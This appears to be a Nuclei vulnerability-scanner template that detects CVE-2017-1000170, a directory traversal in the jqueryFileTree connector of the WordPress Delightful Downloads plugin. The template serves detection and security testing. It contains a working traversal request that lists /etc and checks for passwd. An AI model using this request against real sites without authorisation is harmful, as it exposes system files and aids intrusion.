nuclei-templates/cves/2017/CVE-2017-1000170.yaml

26 lines
776 B
YAML
Raw Normal View History

2021-03-23 12:56:42 +00:00
id: CVE-2017-1000170
info:
name: WordPress Plugin Delightful Downloads Jquery File Tree 2.1.5 Path Traversal
author: dwisiswant0
severity: high
reference: https://www.exploit-db.com/exploits/49693
description: jqueryFileTree 2.1.5 and older Directory Traversal
2021-03-24 08:37:22 +00:00
tags: cve,cve2017,wordpress,wp-plugin,lfi
2021-03-23 12:56:42 +00:00
requests:
- method: POST
path:
- "{{BaseURL}}/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php"
body: "dir=%2Fetc%2F&onlyFiles=true"
matchers-condition: and
matchers:
- type: word
words:
- "<li class='file ext_passwd'>"
2021-03-23 12:56:56 +00:00
- "<a rel='/passwd'>passwd</a></li>"
2021-03-23 12:56:42 +00:00
condition: and
part: body
- type: status
status:
- 200